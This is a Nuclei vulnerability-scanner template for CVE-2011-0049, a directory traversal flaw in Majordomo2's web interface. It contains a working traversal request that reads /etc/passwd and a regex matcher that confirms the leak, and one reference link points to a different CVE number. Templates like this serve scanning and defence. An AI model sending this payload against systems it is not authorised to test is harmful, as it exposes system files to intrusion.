nuclei-templates/cves/2011/CVE-2011-0049.yaml

35 lines
1.1 KiB
YAML

id: CVE-2011-0049
info:
name: Majordomo2 - SMTP/HTTP Directory Traversal
author: pikpikcu
severity: high
description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
reference:
- https://www.exploit-db.com/exploits/16103
- https://nvd.nist.gov/vuln/detail/CVE-2011-0063
- http://www.kb.cert.org/vuls/id/363726
classification:
cve-id: CVE-2011-0049
remediation: Upgrade to a supported version.
tags: cve,cve2011,majordomo2,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/02/18